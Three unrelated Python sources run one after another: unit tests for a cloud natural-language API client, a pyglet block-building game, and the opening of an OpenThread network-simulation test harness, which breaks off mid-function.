doc_type=MUT.Document.HTML,
language=language,
encoding=MUT.Encoding.UTF32)
self.assertIs(document.client, client)
self.assertIsNone(document.content)
self.assertEqual(document.gcs_url, gcs_url)
self.assertEqual(document.doc_type, MUT.Document.HTML)
self.assertEqual(document.language, language)
self.assertEqual(document.encoding, MUT.Encoding.UTF32)
def test_constructor_explicit_language(self):
client = object()
content = 'abc'
document = self._make_one(client, content, language='en-US')
self.assertEqual(document.language, 'en-US')
self.assertEqual(document._to_dict()['language'], 'en-US')
def test_constructor_no_text(self):
with self.assertRaises(ValueError):
self._make_one(None, content=None, gcs_url=None)
def test_constructor_text_and_gcs(self):
with self.assertRaises(ValueError):
self._make_one(None, content='abc',
gcs_url='gs://some-bucket/some-obj.txt')
def test__to_dict_with_content(self):
klass = self._get_target_class()
content = 'Hello World'
document = self._make_one(None, content=content)
info = document._to_dict()
self.assertEqual(info, {
'content': content,
'type': klass.PLAIN_TEXT,
})
def test__to_dict_with_gcs(self):
klass = self._get_target_class()
gcs_url = 'gs://some-bucket/some-obj.html'
document = self._make_one(None, gcs_url=gcs_url)
info = document._to_dict()
self.assertEqual(info, {
'gcsContentUri': gcs_url,
'type': klass.PLAIN_TEXT,
})
def test__to_dict_with_no_content(self):
klass = self._get_target_class()
document = self._make_one(None, content='')
document.content = None # Manually unset the content.
info = document._to_dict()
self.assertEqual(info, {
'type': klass.PLAIN_TEXT,
})
def _verify_entity(self, entity, name, entity_type, wiki_url, salience,
sentiment=None):
from google.cloud.language.entity import Entity
self.assertIsInstance(entity, Entity)
self.assertEqual(entity.name, name)
self.assertEqual(entity.entity_type, entity_type)
if wiki_url:
self.assertEqual(entity.metadata, {'wikipedia_url': wiki_url})
else:
self.assertEqual(entity.metadata, {})
self.assertEqual(entity.salience, salience)
self.assertEqual(len(entity.mentions), 1)
self.assertEqual(entity.mentions[0].text.content, name)
if sentiment:
self.assertEqual(entity.sentiment.score, sentiment.score)
self.assertAlmostEqual(entity.sentiment.magnitude,
sentiment.magnitude)
@staticmethod
def _expected_data(content, encoding_type=None,
extract_sentiment=False,
extract_entities=False,
extract_syntax=False):
from google.cloud.language.document import Document
expected = {
'document': {
'type': Document.PLAIN_TEXT,
'content': content,
},
}
if encoding_type is not None:
expected['encodingType'] = encoding_type
if extract_sentiment:
features = expected.setdefault('features', {})
features['extractDocumentSentiment'] = True
if extract_entities:
features = expected.setdefault('features', {})
features['extractEntities'] = True
if extract_syntax:
features = expected.setdefault('features', {})
features['extractSyntax'] = True
return expected
def test_analyze_entities(self):
from google.cloud.language.document import Encoding
from google.cloud.language.entity import EntityType
name1 = 'R-O-C-K'
name2 = 'USA'
content = name1 + ' in the ' + name2
wiki2 = 'http://en.wikipedia.org/wiki/United_States'
salience1 = 0.91391456
salience2 = 0.086085409
response = {
'entities': [
{
'name': name1,
'type': EntityType.OTHER,
'metadata': {},
'salience': salience1,
'mentions': [
{
'text': {
'content': name1,
'beginOffset': -1
},
'type': 'TYPE_UNKNOWN',
}
]
},
{
'name': name2,
'type': EntityType.LOCATION,
'metadata': {'wikipedia_url': wiki2},
'salience': salience2,
'mentions': [
{
'text': {
'content': name2,
'beginOffset': -1,
},
'type': 'PROPER',
},
],
},
],
'language': 'en-US',
}
client = make_mock_client(response)
document = self._make_one(client, content)
entity_response = document.analyze_entities()
self.assertEqual(len(entity_response.entities), 2)
entity1 = entity_response.entities[0]
self._verify_entity(entity1, name1, EntityType.OTHER,
None, salience1)
entity2 = entity_response.entities[1]
self._verify_entity(entity2, name2, EntityType.LOCATION,
wiki2, salience2)
# Verify the request.
expected = self._expected_data(
content, encoding_type=Encoding.get_default())
client._connection.api_request.assert_called_once_with(
path='analyzeEntities', method='POST', data=expected)
def test_analyze_entity_sentiment_v1_error(self):
client = make_mock_client({})
document = self._make_one(client, 'foo bar baz')
with self.assertRaises(NotImplementedError):
entity_response = document.analyze_entity_sentiment()
def test_analyze_entity_sentiment(self):
from google.cloud.language.document import Encoding
from google.cloud.language.entity import EntityType
from google.cloud.language.sentiment import Sentiment
name1 = 'R-O-C-K'
name2 = 'USA'
content = name1 + ' in the ' + name2
wiki2 = 'http://en.wikipedia.org/wiki/United_States'
salience1 = 0.91391456
salience2 = 0.086085409
sentiment = Sentiment(score=0.15, magnitude=42)
response = {
'entities': [
{
'name': name1,
'type': EntityType.OTHER,
'metadata': {},
'salience': salience1,
'mentions': [
{
'text': {
'content': name1,
'beginOffset': -1
},
'type': 'TYPE_UNKNOWN',
}
],
'sentiment': {
'score': 0.15,
'magnitude': 42,
}
},
{
'name': name2,
'type': EntityType.LOCATION,
'metadata': {'wikipedia_url': wiki2},
'salience': salience2,
'mentions': [
{
'text': {
'content': name2,
'beginOffset': -1,
},
'type': 'PROPER',
},
],
'sentiment': {
'score': 0.15,
'magnitude': 42,
}
},
],
'language': 'en-US',
}
client = make_mock_client(response, api_version='v1beta2')
document = self._make_one(client, content)
entity_response = document.analyze_entity_sentiment()
self.assertEqual(len(entity_response.entities), 2)
entity1 = entity_response.entities[0]
self._verify_entity(entity1, name1, EntityType.OTHER,
None, salience1, sentiment)
entity2 = entity_response.entities[1]
self._verify_entity(entity2, name2, EntityType.LOCATION,
wiki2, salience2, sentiment)
# Verify the request.
expected = self._expected_data(
content, encoding_type=Encoding.get_default())
client._connection.api_request.assert_called_once_with(
path='analyzeEntitySentiment', method='POST', data=expected)
def _verify_sentiment(self, sentiment, score, magnitude):
from google.cloud.language.sentiment import Sentiment
self.assertIsInstance(sentiment, Sentiment)
self.assertEqual(sentiment.score, score)
self.assertEqual(sentiment.magnitude, magnitude)
def test_analyze_sentiment(self):
from google.cloud.language.api_responses import SentimentResponse
content = 'All the pretty horses.'
score = 1
magnitude = 0.6
response = {
'documentSentiment': {
'score': score,
'magnitude': magnitude,
},
'language': 'en-US',
}
client = make_mock_client(response)
document = self._make_one(client, content)
sentiment_response = document.analyze_sentiment()
self.assertIsInstance(sentiment_response, SentimentResponse)
self._verify_sentiment(sentiment_response.sentiment, score, magnitude)
# Verify the request.
expected = self._expected_data(content)
client._connection.api_request.assert_called_once_with(
path='analyzeSentiment', method='POST', data=expected)
def _verify_token(self, token, text_content, part_of_speech_tag, lemma):
from google.cloud.language.syntax import Token
self.assertIsInstance(token, Token)
self.assertEqual(token.text_content, text_content)
self.assertEqual(token.part_of_speech.tag, part_of_speech_tag)
self.assertEqual(token.lemma, lemma)
def test_analyze_syntax(self):
from google.cloud.language.api_responses import SyntaxResponse
from google.cloud.language.document import Encoding
from google.cloud.language.syntax import PartOfSpeech
name1 = 'R-O-C-K'
name2 = 'USA'
content = name1 + ' in the ' + name2
response = {
'sentences': [
{
'text': {
'content': 'R-O-C-K in the USA',
'beginOffset': -1,
},
'sentiment': None,
}
],
'tokens': [
{
'text': {
'content': 'R-O-C-K',
'beginOffset': -1,
},
'partOfSpeech': {
'aspect': 'ASPECT_UNKNOWN',
'reciprocity': 'RECIPROCITY_UNKNOWN',
'case': 'CASE_UNKNOWN',
'mood': 'MOOD_UNKNOWN',
'tag': 'NOUN',
'person': 'PERSON_UNKNOWN',
'number': 'SINGULAR',
'tense': 'TENSE_UNKNOWN',
'form': 'FORM_UNKNOWN',
'proper': 'PROPER',
'voice': 'VOICE_UNKNOWN',
'gender': 'GENDER_UNKNOWN'
},
'dependencyEdge': {
'headTokenIndex': 0,
'label': 'ROOT',
},
'lemma': 'R-O-C-K',
},
{
'text': {
'content': 'in',
'beginOffset': -1,
},
'partOfSpeech': {
'aspect': 'ASPECT_UNKNOWN',
'reciprocity': 'RECIPROCITY_UNKNOWN',
'case': 'CASE_UNKNOWN',
'mood': 'MOOD_UNKNOWN',
'tag': 'ADP',
'person': 'PERSON_UNKNOWN',
'number': 'NUMBER_UNKNOWN',
'tense': 'TENSE_UNKNOWN',
'form': 'FORM_UNKNOWN',
'proper': 'PROPER_UNKNOWN',
'voice': 'VOICE_UNKNOWN',
'gender': 'GENDER_UNKNOWN'
},
'dependencyEdge': {
'headTokenIndex': 0,
'label': 'PREP',
},
'lemma': 'in',
},
{
'text': {
'content': 'the',
'beginOffset': -1,
},
'partOfSpeech': {
'aspect': 'ASPECT_UNKNOWN',
'reciprocity': 'RECIPROCITY_UNKNOWN',
'case': 'CASE_UNKNOWN',
'mood': 'MOOD_UNKNOWN',
'tag': 'DET',
'person': 'PERSON_UNKNOWN',
'number': 'NUMBER_UNKNOWN',
'tense': 'TENSE_UNKNOWN',
'form': 'FORM_UNKNOWN',
'proper': 'PROPER_UNKNOWN',
'voice': 'VOICE_UNKNOWN',
'gender': 'GENDER_UNKNOWN'
},
'dependencyEdge': {
'headTokenIndex': 3,
'label': 'DET',
},
'lemma': 'the',
},
{
'text': {
'content': 'USA',
'beginOffset': -1,
},
'partOfSpeech': {
'aspect': 'ASPECT_UNKNOWN',
'reciprocity': 'RECIPROCITY_UNKNOWN',
'case': 'CASE_UNKNOWN',
'mood': 'MOOD_UNKNOWN',
'tag': 'NOUN',
'person': 'PERSON_UNKNOWN',
'number': 'SINGULAR',
'tense': 'TENSE_UNKNOWN',
'form': 'FORM_UNKNOWN',
'proper': 'PROPER',
'voice': 'VOICE_UNKNOWN',
'gender': 'GENDER_UNKNOWN'
},
'dependencyEdge': {
'headTokenIndex': 1,
'label': 'POBJ',
},
'lemma': 'USA',
},
],
'language': 'en-US',
}
client = make_mock_client(response)
document = self._make_one(client, content)
syntax_response = document.analyze_syntax()
self.assertIsInstance(syntax_response, SyntaxResponse)
tokens = syntax_response.tokens
self.assertEqual(len(tokens), 4)
token1 = tokens[0]
self._verify_token(token1, name1, PartOfSpeech.NOUN, name1)
token2 = tokens[1]
self._verify_token(token2, 'in', PartOfSpeech.ADPOSITION, 'in')
token3 = tokens[2]
self._verify_token(token3, 'the', PartOfSpeech.DETERMINER, 'the')
token4 = tokens[3]
self._verify_token(token4, name2, PartOfSpeech.NOUN, name2)
# Verify the request.
expected = self._expected_data(
content, encoding_type=Encoding.get_default())
client._connection.api_request.assert_called_once_with(
path='analyzeSyntax', method='POST', data=expected)
def _verify_sentences(self, include_syntax, annotations):
from google.cloud.language.sentence import Sentence
if include_syntax:
self.assertEqual(len(annotations.sentences), 1)
sentence = annotations.sentences[0]
self.assertIsInstance(sentence, Sentence)
self.assertEqual(sentence.content, ANNOTATE_CONTENT)
self.assertEqual(sentence.begin, -1)
else:
self.assertEqual(annotations.sentences, [])
def _verify_tokens(self, annotations, token_info):
from google.cloud.language.syntax import Token
self.assertEqual(len(annotations.tokens), len(token_info))
for token, info in zip(annotations.tokens, token_info):
self.assertIsInstance(token, Token)
self.assertEqual(token.text_content, info[0])
self.assertEqual(token.text_begin, -1)
self.assertEqual(token.part_of_speech.tag, info[1])
self.assertEqual(token.edge_index, info[2])
self.assertEqual(token.edge_label, info[3])
self.assertEqual(token.lemma, info[0])
def _annotate_text_helper(self, include_sentiment,
include_entities, include_syntax):
from google.cloud.language.document import Annotations
from google.cloud.language.document import Encoding
from google.cloud.language.entity import EntityType
token_info, sentences = _get_token_and_sentences(include_syntax)
entities = _get_entities(include_entities)
tokens = [_make_token_json(*info) for info in token_info]
response = {
'sentences': sentences,
'tokens': tokens,
'entities': entities,
'language': 'en-US',
}
if include_sentiment:
response['documentSentiment'] = {
'score': ANNOTATE_SCORE,
'magnitude': ANNOTATE_MAGNITUDE,
}
client = make_mock_client(response)
document = self._make_one(client, ANNOTATE_CONTENT)
annotations = document.annotate_text(
include_syntax=include_syntax, include_entities=include_entities,
include_sentiment=include_sentiment)
self.assertIsInstance(annotations, Annotations)
# Sentences
self._verify_sentences(include_syntax, annotations)
# Token
self._verify_tokens(annotations, token_info)
# Sentiment
if include_sentiment:
self._verify_sentiment(annotations.sentiment,
ANNOTATE_SCORE, ANNOTATE_MAGNITUDE)
else:
self.assertIsNone(annotations.sentiment)
# Entity
if include_entities:
self.assertEqual(len(annotations.entities), 1)
entity = annotations.entities[0]
self._verify_entity(entity, ANNOTATE_NAME, EntityType.LOCATION,
ANNOTATE_WIKI_URL, ANNOTATE_SALIENCE)
else:
self.assertEqual(annotations.entities, [])
# Verify the request.
expected = self._expected_data(
ANNOTATE_CONTENT, encoding_type=Encoding.get_default(),
extract_sentiment=include_sentiment,
extract_entities=include_entities,
extract_syntax=include_syntax)
client._connection.api_request.assert_called_once_with(
path='annotateText', method='POST', data=expected)
def test_annotate_text(self):
self._annotate_text_helper(True, True, True)
def test_annotate_text_sentiment_only(self):
self._annotate_text_helper(True, False, False)
def test_annotate_text_entities_only(self):
self._annotate_text_helper(False, True, False)
def test_annotate_text_syntax_only(self):
self._annotate_text_helper(False, False, True)
|
|
from pyglet.gl import *
from pyglet.window import key
from ctypes import c_float
import math
import random
import time
SECTOR_SIZE = 16
def cube_vertices(x, y, z, n):
return [
x-n,y+n,z-n, x-n,y+n,z+n, x+n,y+n,z+n, x+n,y+n,z-n, # top
x-n,y-n,z-n, x+n,y-n,z-n, x+n,y-n,z+n, x-n,y-n,z+n, # bottom
x-n,y-n,z-n, x-n,y-n,z+n, x-n,y+n,z+n, x-n,y+n,z-n, # left
x+n,y-n,z+n, x+n,y-n,z-n, x+n,y+n,z-n, x+n,y+n,z+n, # right
x-n,y-n,z+n, x+n,y-n,z+n, x+n,y+n,z+n, x-n,y+n,z+n, # front
x+n,y-n,z-n, x-n,y-n,z-n, x-n,y+n,z-n, x+n,y+n,z-n, # back
]
def tex_coord(x, y, n=4):
m = 1.0 / n
dx = x * m
dy = y * m
return dx, dy, dx + m, dy, dx + m, dy + m, dx, dy + m
def tex_coords(top, bottom, side):
top = tex_coord(*top)
bottom = tex_coord(*bottom)
side = tex_coord(*side)
result = []
result.extend(top)
result.extend(bottom)
result.extend(side * 4)
return result
GRASS = tex_coords((1, 0), (0, 1), (0, 0))
SAND = tex_coords((1, 1), (1, 1), (1, 1))
BRICK = tex_coords((2, 0), (2, 0), (2, 0))
STONE = tex_coords((2, 1), (2, 1), (2, 1))
FACES = [
( 0, 1, 0),
( 0,-1, 0),
(-1, 0, 0),
( 1, 0, 0),
( 0, 0, 1),
( 0, 0,-1),
]
class TextureGroup(pyglet.graphics.Group):
def __init__(self, path):
super(TextureGroup, self).__init__()
self.texture = pyglet.image.load(path).get_texture()
def set_state(self):
glEnable(self.texture.target)
glBindTexture(self.texture.target, self.texture.id)
def unset_state(self):
glDisable(self.texture.target)
def normalize(position):
x, y, z = position
x, y, z = (int(round(x)), int(round(y)), int(round(z)))
return (x, y, z)
def sectorize(position):
x, y, z = normalize(position)
x, y, z = x / SECTOR_SIZE, y / SECTOR_SIZE, z / SECTOR_SIZE
return (x, 0, z)
class Model(object):
def __init__(self):
self.batch = pyglet.graphics.Batch()
self.group = TextureGroup('texture.png')
self.world = {}
self.shown = {}
self._shown = {}
self.sectors = {}
self.queue = []
self.initialize()
def initialize(self):
n = 80
s = 1
y = 0
for x in xrange(-n, n + 1, s):
for z in xrange(-n, n + 1, s):
self.init_block((x, y - 2, z), GRASS)
self.init_block((x, y - 3, z), STONE)
if x in (-n, n) or z in (-n, n):
for dy in xrange(-2, 3):
self.init_block((x, y + dy, z), STONE)
o = n - 10
for _ in xrange(120):
a = random.randint(-o, o)
b = random.randint(-o, o)
c = -1
h = random.randint(1, 6)
s = random.randint(4, 8)
d = 1
t = random.choice([GRASS, SAND, BRICK])
for y in xrange(c, c + h):
for x in xrange(a - s, a + s + 1):
for z in xrange(b - s, b + s + 1):
if (x - a) ** 2 + (z - b) ** 2 > (s + 1) ** 2:
continue
if (x - 0) ** 2 + (z - 0) ** 2 < 5 ** 2:
continue
self.init_block((x, y, z), t)
s -= d
def hit_test(self, position, vector, max_distance=8):
m = 8
x, y, z = position
dx, dy, dz = vector
previous = None
for _ in xrange(max_distance * m):
key = normalize((x, y, z))
if key != previous and key in self.world:
return key, previous
previous = key
x, y, z = x + dx / m, y + dy / m, z + dz / m
return None, None
def exposed(self, position):
x, y, z = position
for dx, dy, dz in FACES:
if (x + dx, y + dy, z + dz) not in self.world:
return True
return False
def init_block(self, position, texture):
self.add_block(position, texture, False)
def add_block(self, position, texture, sync=True):
if position in self.world:
self.remove_block(position, sync)
self.world[position] = texture
self.sectors.setdefault(sectorize(position), []).append(position)
if sync:
if self.exposed(position):
self.show_block(position)
self.check_neighbors(position)
def remove_block(self, position, sync=True):
del self.world[position]
self.sectors[sectorize(position)].remove(position)
if sync:
if position in self.shown:
self.hide_block(position)
self.check_neighbors(position)
def check_neighbors(self, position):
x, y, z = position
for dx, dy, dz in FACES:
key = (x + dx, y + dy, z + dz)
if key not in self.world:
continue
if self.exposed(key):
if key not in self.shown:
self.show_block(key)
else:
if key in self.shown:
self.hide_block(key)
def show_blocks(self):
for position in self.world:
if position not in self.shown and self.exposed(position):
self.show_block(position)
def show_block(self, position, immediate=True):
texture = self.world[position]
self.shown[position] = texture
if immediate:
self._show_block(position, texture)
else:
self.enqueue(self._show_block, position, texture)
def _show_block(self, position, texture):
x, y, z = position
# only show exposed faces
index = 0
count = 24
vertex_data = cube_vertices(x, y, z, 0.5)
texture_data = list(texture)
for dx, dy, dz in []:#FACES:
if (x + dx, y + dy, z + dz) in self.world:
count -= 4
i = index * 12
j = index * 8
del vertex_data[i:i + 12]
del texture_data[j:j + 8]
else:
index += 1
# create vertex list
self._shown[position] = self.batch.add(count, GL_QUADS, self.group,
('v3f/static', vertex_data),
('t2f/static', texture_data))
def hide_block(self, position, immediate=True):
self.shown.pop(position)
if immediate:
self._hide_block(position)
else:
self.enqueue(self._hide_block, position)
def _hide_block(self, position):
self._shown.pop(position).delete()
def show_sector(self, sector):
for position in self.sectors.get(sector, []):
if position not in self.shown and self.exposed(position):
self.show_block(position, False)
def hide_sector(self, sector):
for position in self.sectors.get(sector, []):
if position in self.shown:
self.hide_block(position, False)
def change_sectors(self, before, after):
before_set = set()
after_set = set()
pad = 4
for dx in xrange(-pad, pad + 1):
for dy in [0]: # xrange(-pad, pad + 1):
for dz in xrange(-pad, pad + 1):
if dx ** 2 + dy ** 2 + dz ** 2 > (pad + 1) ** 2:
continue
if before:
x, y, z = before
before_set.add((x + dx, y + dy, z + dz))
if after:
x, y, z = after
after_set.add((x + dx, y + dy, z + dz))
show = after_set - before_set
hide = before_set - after_set
for sector in show:
self.show_sector(sector)
for sector in hide:
self.hide_sector(sector)
def enqueue(self, func, *args):
self.queue.append((func, args))
def dequeue(self):
func, args = self.queue.pop(0)
func(*args)
def process_queue(self):
start = time.clock()
while self.queue and time.clock() - start < 1 / 60.0:
self.dequeue()
def process_entire_queue(self):
while self.queue:
self.dequeue()
class Window(pyglet.window.Window):
def __init__(self, *args, **kwargs):
super(Window, self).__init__(*args, **kwargs)
self.exclusive = False
self.flying = False
self.strafe = [0, 0]
self.position = (0, 0, 0)
self.rotation = (0, 0)
self.sector = None
self.reticle = None
self.dy = 0
self.model = Model()
self.label = pyglet.text.Label('', font_name='Arial', font_size=18,
x=10, y=self.height - 10, anchor_x='left', anchor_y='top',
color=(0, 0, 0, 255))
pyglet.clock.schedule_interval(self.update, 1.0 / 60)
def set_exclusive_mouse(self, exclusive):
super(Window, self).set_exclusive_mouse(exclusive)
self.exclusive = exclusive
def get_sight_vector(self):
x, y = self.rotation
m = math.cos(math.radians(y))
dy = math.sin(math.radians(y))
dx = math.cos(math.radians(x - 90)) * m
dz = math.sin(math.radians(x - 90)) * m
return (dx, dy, dz)
def get_motion_vector(self):
if any(self.strafe):
x, y = self.rotation
strafe = math.degrees(math.atan2(*self.strafe))
if self.flying:
m = math.cos(math.radians(y))
dy = math.sin(math.radians(y))
if self.strafe[1]:
dy = 0.0
m = 1
if self.strafe[0] > 0:
dy *= -1
dx = math.cos(math.radians(x + strafe)) * m
dz = math.sin(math.radians(x + strafe)) * m
else:
dy = 0.0
dx = math.cos(math.radians(x + strafe))
dz = math.sin(math.radians(x + strafe))
else:
dy = 0.0
dx = 0.0
dz = 0.0
return (dx, dy, dz)
def update(self, dt):
self.model.process_queue()
sector = sectorize(self.position)
if sector != self.sector:
self.model.change_sectors(self.sector, sector)
if self.sector is None:
self.model.process_entire_queue()
self.sector = sector
m = 8
dt = min(dt, 0.2)
for _ in xrange(m):
self._update(dt / m)
def _update(self, dt):
# walking
speed = 15 if self.flying else 5
d = dt * speed
dx, dy, dz = self.get_motion_vector()
dx, dy, dz = dx * d, dy * d, dz * d
# gravity
if not self.flying:
self.dy -= dt * 0.044 # g force, should be = jump_speed * 0.5 / max_jump_height
self.dy = max(self.dy, -0.5) # terminal velocity
dy += self.dy
# collisions
x, y, z = self.position
x, y, z = self.collide((x + dx, y + dy, z + dz), 2)
self.position = (x, y, z)
def collide(self, position, height):
pad = 0.25
p = list(position)
np = normalize(position)
for face in FACES: # check all surrounding blocks
for i in xrange(3): # check each dimension independently
if not face[i]:
continue
d = (p[i] - np[i]) * face[i]
if d < pad:
continue
for dy in xrange(height): # check each height
op = list(np)
op[1] -= dy
op[i] += face[i]
op = tuple(op)
if op not in self.model.world:
continue
p[i] -= (d - pad) * face[i]
if face == (0, -1, 0) or face == (0, 1, 0):
self.dy = 0
break
return tuple(p)
def on_mouse_scroll(self, x, y, scroll_x, scroll_y):
return
x, y, z = self.position
dx, dy, dz = self.get_sight_vector()
d = scroll_y * 10
self.position = (x + dx * d, y + dy * d, z + dz * d)
def on_mouse_press(self, x, y, button, modifiers):
if self.exclusive:
vector = self.get_sight_vector()
block, previous = self.model.hit_test(self.position, vector)
if button == pyglet.window.mouse.LEFT:
if block:
texture = self.model.world[block]
if texture != STONE:
self.model.remove_block(block)
else:
if previous:
self.model.add_block(previous, BRICK)
else:
self.set_exclusive_mouse(True)
def on_mouse_motion(self, x, y, dx, dy):
if self.exclusive:
m = 0.15
x, y = self.rotation
x, y = x + dx * m, y + dy * m
y = max(-90, min(90, y))
self.rotation = (x, y)
def on_key_press(self, symbol, modifiers):
if symbol == key.W:
self.strafe[0] -= 1
elif symbol == key.S:
self.strafe[0] += 1
elif symbol == key.A:
self.strafe[1] -= 1
elif symbol == key.D:
self.strafe[1] += 1
elif symbol == key.SPACE:
if self.dy == 0:
self.dy = 0.015 # jump speed
elif symbol == key.ESCAPE:
self.set_exclusive_mouse(False)
elif symbol == key.TAB:
self.flying = not self.flying
def on_key_release(self, symbol, modifiers):
if symbol == key.W:
self.strafe[0] += 1
elif symbol == key.S:
self.strafe[0] -= 1
elif symbol == key.A:
self.strafe[1] += 1
elif symbol == key.D:
self.strafe[1] -= 1
def on_resize(self, width, height):
# label
self.label.y = height - 10
# reticle
if self.reticle:
self.reticle.delete()
x, y = self.width / 2, self.height / 2
n = 10
self.reticle = pyglet.graphics.vertex_list(4,
('v2i', (x - n, y, x + n, y, x, y - n, x, y + n))
)
def set_2d(self):
width, height = self.get_size()
glDisable(GL_DEPTH_TEST)
glViewport(0, 0, width, height)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glOrtho(0, width, 0, height, -1, 1)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
def set_3d(self):
width, height = self.get_size()
glEnable(GL_DEPTH_TEST)
glViewport(0, 0, width, height)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
gluPerspective(65.0, width / float(height), 0.1, 60.0)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
x, y = self.rotation
glRotatef(x, 0, 1, 0)
glRotatef(-y, math.cos(math.radians(x)), 0, math.sin(math.radians(x)))
x, y, z = self.position
glTranslatef(-x, -y, -z)
def on_draw(self):
self.clear()
self.set_3d()
glColor3d(1, 1, 1)
self.model.batch.draw()
self.draw_focused_block()
self.set_2d()
self.draw_label()
self.draw_reticle()
def draw_focused_block(self):
vector = self.get_sight_vector()
block = self.model.hit_test(self.position, vector)[0]
if block:
x, y, z = block
vertex_data = cube_vertices(x, y, z, 0.51)
glColor3d(0, 0, 0)
glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)
pyglet.graphics.draw(24, GL_QUADS, ('v3f/static', vertex_data))
glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)
def draw_label(self):
x, y, z = self.position
self.label.text = '%02d (%.2f, %.2f, %.2f) %d / %d' % (
pyglet.clock.get_fps(), x, y, z,
len(self.model._shown), len(self.model.world))
self.label.draw()
def draw_reticle(self):
glColor3d(0, 0, 0)
self.reticle.draw(GL_LINES)
def setup_fog():
glEnable(GL_FOG)
glFogfv(GL_FOG_COLOR, (c_float * 4)(0.53, 0.81, 0.98, 1))
glHint(GL_FOG_HINT, GL_DONT_CARE)
glFogi(GL_FOG_MODE, GL_LINEAR)
glFogf(GL_FOG_DENSITY, 0.35)
glFogf(GL_FOG_START, 20.0)
glFogf(GL_FOG_END, 60.0)
def setup():
glClearColor(0.53, 0.81, 0.98, 1)
glEnable(GL_CULL_FACE)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST)
glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST)
setup_fog()
def main():
window = Window(width=800, height=600, caption='Pyglet', resizable=True)
window.set_exclusive_mouse(True)
setup()
pyglet.app.run()
if __name__ == '__main__':
main()
|
|
#!/usr/bin/env python
#
# Copyright (c) 2016, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import config
import ipaddress
import os
import sys
import pexpect
import pexpect.popen_spawn
import re
import simulator
import socket
import time
import unittest
class Node:
def __init__(self, nodeid, is_mtd=False, simulator=None):
self.nodeid = nodeid
self.verbose = int(float(os.getenv('VERBOSE', 0)))
self.node_type = os.getenv('NODE_TYPE', 'sim')
self.simulator = simulator
if self.simulator:
self.simulator.add_node(self)
mode = os.environ.get('USE_MTD') == '1' and is_mtd and 'mtd' or 'ftd'
if self.node_type == 'soc':
self.__init_soc(nodeid)
elif self.node_type == 'ncp-sim':
# TODO use mode after ncp-mtd is available.
self.__init_ncp_sim(nodeid, 'ftd')
else:
self.__init_sim(nodeid, mode)
if self.verbose:
if sys.version_info[0] == 2:
self.pexpect.logfile_read = sys.stdout
else:
self.pexpect.logfile_read = sys.stdout.buffer
self._initialized = True
def __init_sim(self, nodeid, mode):
""" Initialize a simulation node. """
if 'OT_CLI_PATH' in os.environ.keys():
cmd = os.environ['OT_CLI_PATH']
elif 'top_builddir' in os.environ.keys():
srcdir = os.environ['top_builddir']
cmd = '%s/examples/apps/cli/ot-cli-%s' % (srcdir, mode)
else:
cmd = './ot-cli-%s' % mode
if 'RADIO_DEVICE' in os.environ:
cmd += ' -v %s' % os.environ['RADIO_DEVICE']
os.environ['NODE_ID'] = str(nodeid)
cmd += ' %d' % nodeid
print("%s" % cmd)
self.pexpect = pexpect.popen_spawn.PopenSpawn(cmd, timeout=4)
# Add delay to ensure that the process is ready to receive commands.
timeout = 0.4
while timeout > 0:
self.pexpect.send('\r\n')
try:
self.pexpect.expect('> ', timeout=0.1)
break
except pexpect.TIMEOUT:
timeout -= 0.1
def __init_ncp_sim(self, nodeid, mode):
""" Initialize an NCP simulation node. """
if 'RADIO_DEVICE' in os.environ:
args = ' %s' % os.environ['RADIO_DEVICE']
os.environ['NODE_ID'] = str(nodeid)
else:
args = ''
if 'OT_NCP_PATH' in os.environ.keys():
cmd = 'spinel-cli.py -p "%s%s" -n' % (
os.environ['OT_NCP_PATH'],
args,
)
elif "top_builddir" in os.environ.keys():
builddir = os.environ['top_builddir']
cmd = 'spinel-cli.py -p "%s/examples/apps/ncp/ot-ncp-%s%s" -n' % (
builddir,
mode,
args,
)
else:
cmd = 'spinel-cli.py -p "./ot-ncp-%s%s" -n' % (mode, args)
cmd += ' %d' % nodeid
print("%s" % cmd)
self.pexpect = pexpect.spawn(cmd, timeout=4)
# Add delay to ensure that the process is ready to receive commands.
time.sleep(0.2)
self._expect('spinel-cli >')
self.debug(int(os.getenv('DEBUG', '0')))
def _expect(self, pattern, timeout=-1, *args, **kwargs):
""" Process simulator events until expected the pattern. """
if timeout == -1:
timeout = self.pexpect.timeout
assert timeout > 0
while timeout > 0:
try:
return self.pexpect.expect(pattern, 0.1, *args, **kwargs)
except pexpect.TIMEOUT:
timeout -= 0.1
self.simulator.go(0)
if timeout <= 0:
raise
def __init_soc(self, nodeid):
""" Initialize a System-on-a-chip node connected via UART. """
import fdpexpect
serialPort = '/dev/ttyUSB%d' % ((nodeid - 1) * 2)
